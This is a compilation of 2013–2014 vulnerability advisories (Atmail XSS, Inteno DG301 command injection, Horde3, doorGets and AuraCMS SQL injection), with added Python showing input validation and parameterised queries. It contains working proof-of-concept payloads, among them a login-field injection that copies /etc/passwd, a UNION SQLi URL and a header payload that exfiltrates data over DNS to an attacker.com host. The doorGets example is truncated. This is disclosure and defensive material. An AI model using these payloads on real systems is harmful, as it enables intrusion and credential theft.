http:///index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=This+is+an+XSS+example&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Tested in Atmail 7.0.2. Other versions may be affected too.

VII. SOLUTION
-
-

VIII. REFERENCES
-
http://www.atmail.com
http://www.isecauditors.com

IX. CREDITS
-
This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-
March 9, 2013: Initial release
March 22, 2013: Last revision

XI. DISCLOSURE TIMELINE
-
March 9, 2013: Discovered by Internet Security Auditors
March 22, 2013: Advisory updated with new XSS vulnerable resources
October 8, 2013: First contact with developer team
October 16, 2013: Second contact with developer team
November 28, 2013: Third contact with developer team
January 10, 2014: Last contact and release

XII. LEGAL NO
Inteno DG301 Command Injection
1.Background According to the vendor, Inteno DG301 is a high-end Multi-WAN residential gateway with advanced router and bridge functions. 2.Summary Inteno DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire 10.03.1-RC6 is vulnerable to command injection, which can be exploited directly from the login form on the web interface. The vulnerability could be exploited by unauthenticated attackers. Successful exploitation would allow attackers to execute arbitrary commands with root privileges. 3.Affected Products DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire 10.03.1-RC6. Other products or previous versions may also be vulnerable. 4.Vulnerability and Proof of Concept (PoC) The login form presented on the web administration interface (username parameter) is vulnerable to command injection, due to the application does not validate the user input in a proper manner. The following PoC includes a POST request that should be sent to the device via web. The request includes a command that will copy the contents of "/etc/passwd" to a file "test.txt" on the root web folder were the web administration interface is published. POST /cgi-bin/luci HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 Gecko/20100101 Firefox Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: sysauth=55f19d843ebf2de094b8a8a2acf5c3a7; sysauth= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 60 username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass After the request is sent, proceed to visit http:///test.txt. This should display the contents of "/etc/passwd", including the root password in encrypted (DES) form. From here, the root credentials could be cracked in a reasonable amount of time. This attack could also be used for enabling services (e.g. SSH), or running any other arbitrary commands. 
A general implementation of this PoC can be found here: http://www.encripto.no/tools/inteno-DG301-PoC.tar.gz

5. Remediation

The vendor has released a new firmware version - 1.6.8RC3. Users are encouraged to update their devices in order to patch the vulnerability.

6. Credit

The vulnerability was originally discovered in an Inteno DG301 device (manufactured Nov. 2013), by Juan J. Güelfo at Encripto AS.
E-mail: p...@encripto.no
Web: http://www.encripto.no

For more information about Encripto's research policy, please visit http://www.encripto.no/forskning/

7. Timeline

24th of January 2014 - Vulnerabilities discovered by the researcher.
26th of January 2014 - Vulnerability details disclosed to the vendor.
31st of January 2014 - New firmware version launched by the vendor, which addresses the vulnerability.
3rd of February 2014 - Public disclosure.

8. References

http://www.encripto.no/forskning/whitepapers/Inteno_DG301_advisory_feb_2014.pdf
http://www.encripto.no/tools/inteno-DG301-PoC.tar.gz

DISCLAIMER

The material presented in this document is for educational purposes only. Encripto AS cannot be responsible for any loss or damage carried out by any technique presented in this material. The reader is the only one responsible for applying this knowledge, which is at his / her own risk. Any of the trademarks, service marks, collective marks, design rights, personality rights or similar rights that are mentioned, used or cited in this document is property of their respective owners.
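The injection above works because the login field reaches a shell command string unchanged. The following Python is an added example, not code from the Inteno firmware or from Encripto's PoC archive: it shows the allowlist check a fixed login handler would apply to the username field, and a scan over request-body records that flags the shell metacharacters the PoC depends on. The request records are constructed for this example; only the `username=user`cp ...`` body is taken from the advisory.

```python
"""Detect and reject shell-metacharacter injection in a login parameter.

Added example, not code from the Inteno firmware or the Encripto PoC.
SAMPLE_REQUESTS is constructed for this example; only the second body
is the payload quoted in the advisory.
"""
import re
from urllib.parse import parse_qs

# Sequences that let a form value escape a shell command string:
# backticks, command separators, pipes, newlines and $(...).
SHELL_META = re.compile(r"[`;|&\n]|\$\(")

# Allowlist for account names: letters, digits and a few separators only.
USERNAME_OK = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def is_valid_username(value: str) -> bool:
    """Allowlist check a fixed login handler applies before any other use."""
    return USERNAME_OK.fullmatch(value) is not None


def injection_attempt(body: str) -> bool:
    """True if the URL-encoded form body carries a shell-breaking username.

    parse_qs URL-decodes the values, so an encoded %3B is inspected as ';'.
    """
    fields = parse_qs(body, keep_blank_values=True)
    return any(SHELL_META.search(v) for v in fields.get("username", []))


# Constructed request records: (client address, path, POST body).
SAMPLE_REQUESTS = [
    ("192.168.1.50", "/cgi-bin/luci", "username=admin&password=secret"),
    ("192.168.1.77", "/cgi-bin/luci",
     "username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass"),
    ("192.168.1.78", "/cgi-bin/luci", "username=bob%3Bid&password=x"),
    ("192.168.1.79", "/cgi-bin/luci", "username=alice@example.com&password=x"),
    ("192.168.1.80", "/", ""),
]


def suspicious_logins(records):
    """Client addresses whose login request body looks like command injection."""
    return [client for client, path, body in records
            if path == "/cgi-bin/luci" and injection_attempt(body)]


if __name__ == "__main__":
    for client in suspicious_logins(SAMPLE_REQUESTS):
        print("possible command injection from", client)
```

The allowlist is the actual fix; the metacharacter scan is only a detection aid, since a valid username never needs any of those characters. Validation has to be paired with never interpolating the field into a shell string at all, otherwise a future change to the allowlist silently reopens the hole.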
[SECURITY] [DSA 2853-1] horde3 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -
Debian Security Advisory DSA-2853-1                   secur...@debian.org
http://www.debian.org/security/                            Luciano Bello
February 05, 2014                      http://www.debian.org/security/faq
- -

Package        : horde3
Vulnerability  : Remote code execution
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2014-1691
Debian Bug     : 737149

Pedro Ribeiro from Agile Information Security found a possible remote code execution on Horde3, a web application framework. Unsanitized variables are passed to the unserialize() PHP function. A remote attacker could specially craft one of those variables, allowing her to load and execute code.

For the oldstable distribution (squeeze), this problem has been fixed in version 3.3.8+debian0-3.

In the testing (jessie) and unstable (sid) distributions, Horde is distributed in the php-horde-util package. This problem has been fixed in version 2.3.0-1.

We recommend that you upgrade your horde3 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlLyKAcACgkQQWTRs4lLtHlWcACfT0u21jD6K068z14ulj6O5a5D
lhoAoK0KKLs0hF68bUtFPo6DmFauGmpa
=wdfw
-----END PGP SIGNATURE-----
SQL Injection in doorGets CMS
Advisory ID: HTB23197
Product: doorGets CMS
Vendor: doorGets
Vulnerable Version(s): 5.2 and probably prior
Tested Version: 5.2
Advisory Publication: January 15, 2014 [without technical details]
Vendor Notification: January 15, 2014
Vendor Patch: January 15, 2014
Public Disclosure: February 5, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-1459
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in doorGets CMS, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in doorGets CMS: CVE-2014-1459

The vulnerability exists due to insufficient validation of the "_position_down_id" HTTP POST parameter passed to the "/dg-admin/index.php" script. A remote attacker with access to the administrative interface can execute arbitrary SQL commands in the application's database. This vulnerability can also be exploited by a remote unauthenticated user via a CSRF vector.

The following exploitation example is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC uses a CSRF vector to send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

http://[host]/dg-admin/?controller=rubriques"; method="post" name="main"> document.getElementById('btn').click();

---

Solution:

Fixed by vendor on January 15, 2014 directly in the source code without version modification/new release. Update to the version 5.2 released after January 15, 2014.
More Information:
https://github.com/doorgets/doorGets/commit/6b81541fc1e5dd1c70614585c1a04d04ccdb3b19

---

References:

[1] High-Tech Bridge Advisory HTB23197 - https://www.htbridge.com/advisory/HTB23197 - SQL Injection in doorGets CMS.
[2] doorGets CMS - http://www.doorgets.com - doorGets CMS is a free content management system (CMS) that allows you to easily create your corporate or personal website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

---

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple SQL Injection Vulnerabilities in AuraCMS
Advisory ID: HTB23196
Product: AuraCMS
Vendor: AuraCMS
Vulnerable Version(s): 2.3 and probably prior
Tested Version: 2.3
Advisory Publication: January 8, 2014 [without technical details]
Vendor Notification: January 8, 2014
Vendor Patch: January 30, 2014
Public Disclosure: February 5, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-1401
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in AuraCMS, which can be exploited to alter SQL queries and execute arbitrary SQL commands in the application's database.

1) Multiple SQL Injection Vulnerabilities in AuraCMS: CVE-2014-1401

1.1 The vulnerability exists due to insufficient validation of the "search" HTTP GET parameter passed to the "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.

The exploitation example below displays the version of the MySQL server:

http://[host]/index.php?mod=content&action=search&search=1%27%29%2f**%2funion%2f**%2fselect%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202

1.2 The vulnerability exists due to insufficient validation of the "CLIENT_IP", "X_FORWARDED_FOR", "X_FORWARDED", "FORWARDED_FOR" and "FORWARDED" HTTP headers in the "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.
The exploitation example below displays the version of the MySQL server:

GET / HTTP/1.1
CLIENT_IP: '),('',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114) -- 2

---

Solution:

Fixed by vendor on January 30, 2014 directly in the source code without version modification/new release. Update to the version 2.3 released after January 30, 2014.

More Information:
https://github.com/auracms/AuraCMS/commit/4fe9d0d31a32df392f4d6ced8e5c25ed4af19ade

---

References:

[1] High-Tech Bridge Advisory HTB23196 - https://www.htbridge.com/advisory/HTB23196 - Multiple SQL Injection Vulnerabilities in AuraCMS.
[2] AuraCMS - http://auracms.org - AuraCMS is open source software that lets you manage the content of your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

---

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
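Both High-Tech Bridge advisories on this page (the doorGets "_position_down_id" parameter and the AuraCMS "search" parameter and forwarding headers) describe the same root cause: request data spliced into query text. The following Python is an added example, not code from doorGets or AuraCMS, showing the concatenated query beside its parameterised form, a numeric-id check for the kind of value "_position_down_id" carries, and an IP-syntax check for the proxy headers AuraCMS trusted. The in-memory SQLite tables, the function names and the request samples are assumptions made for this example; `sqlite_version()` stands in for the MySQL `version()` call in the advisories, and the header payload is a shortened form of the one shown above.

```python
"""Parameterised queries and header validation against the SQL injection
patterns in the doorGets and AuraCMS advisories.

Added example, not code from either project. The table layout, the
function names and the SQLite database are assumptions made for this
example; the payload shapes follow the advisories' PoCs.
"""
import ipaddress
import re
import sqlite3

# The proxy headers AuraCMS read; a client can set every one of them freely.
FORWARDING_HEADERS = ("CLIENT_IP", "X_FORWARDED_FOR", "X_FORWARDED",
                      "FORWARDED_FOR", "FORWARDED")

# Shortened from the advisory's CLIENT_IP header (constructed prefix only).
ADVISORY_HEADER_PAYLOAD = "'),('',(select load_file(CONCAT(CHAR(92),CHAR(92)"


def client_ip(headers: dict, remote_addr: str) -> str:
    """Return a client address that is guaranteed to parse as an IP.

    The first comma-separated entry of a forwarding header is used only if
    it is a syntactically valid address; anything else falls back to the
    socket peer address, so SQL fragments never reach the database.
    """
    for name in FORWARDING_HEADERS:
        value = headers.get(name)
        if not value:
            continue
        candidate = value.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            continue  # not an address: ignore this header entirely
    return remote_addr


def is_numeric_id(raw: str) -> bool:
    """Ids such as _position_down_id must be plain decimal digits."""
    return re.fullmatch(r"[0-9]{1,18}", raw) is not None


def parse_id(raw: str) -> int:
    if not is_numeric_id(raw):
        raise ValueError(f"not a numeric id: {raw!r}")
    return int(raw)


def setup() -> sqlite3.Connection:
    """In-memory database standing in for the CMS tables (constructed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE visitors (ip TEXT, ua TEXT);
        CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO content VALUES (1, 'Home'), (2, 'About');
    """)
    return db


def record_visit(db, headers: dict, remote_addr: str, ua: str) -> str:
    """Store the visitor; values are bound as data, never spliced into SQL."""
    ip = client_ip(headers, remote_addr)
    db.execute("INSERT INTO visitors (ip, ua) VALUES (?, ?)", (ip, ua))
    return ip


def search_titles_unsafe(db, term: str):
    """The vulnerable shape: user input concatenated into the query text."""
    sql = f"SELECT id, title FROM content WHERE (title LIKE '%{term}%')"
    return db.execute(sql).fetchall()


def search_titles(db, term: str):
    """Hardened form: a placeholder, with LIKE wildcards in the term escaped."""
    escaped = term.replace("\\", "\\\\").replace("%", r"\%").replace("_", r"\_")
    return db.execute(
        "SELECT id, title FROM content WHERE (title LIKE ? ESCAPE '\\')",
        ("%" + escaped + "%",)).fetchall()


# Payload shaped like the AuraCMS 'search' example: close the quote and the
# parenthesis, then UNION in a column of the attacker's choosing.
UNION_PAYLOAD = "1')/**/union/**/select 1,sqlite_version()/**/-- 2"


def unsafe_search_leaks_version(db) -> bool:
    """True: the concatenated query returns the database version."""
    return (1, sqlite3.sqlite_version) in search_titles_unsafe(db, UNION_PAYLOAD)


def safe_search_leaks_version(db) -> bool:
    """False: the same payload is just a string that no title contains."""
    return (1, sqlite3.sqlite_version) in search_titles(db, UNION_PAYLOAD)
```

The placeholder is what closes the hole; the numeric and IP checks are defence in depth that also keep junk out of the tables. Note that `client_ip()` silently discards an unparseable header rather than rejecting the request, which keeps the visitor log working when a misconfigured proxy sends something odd; log the discard if you want the attempt visible to detection.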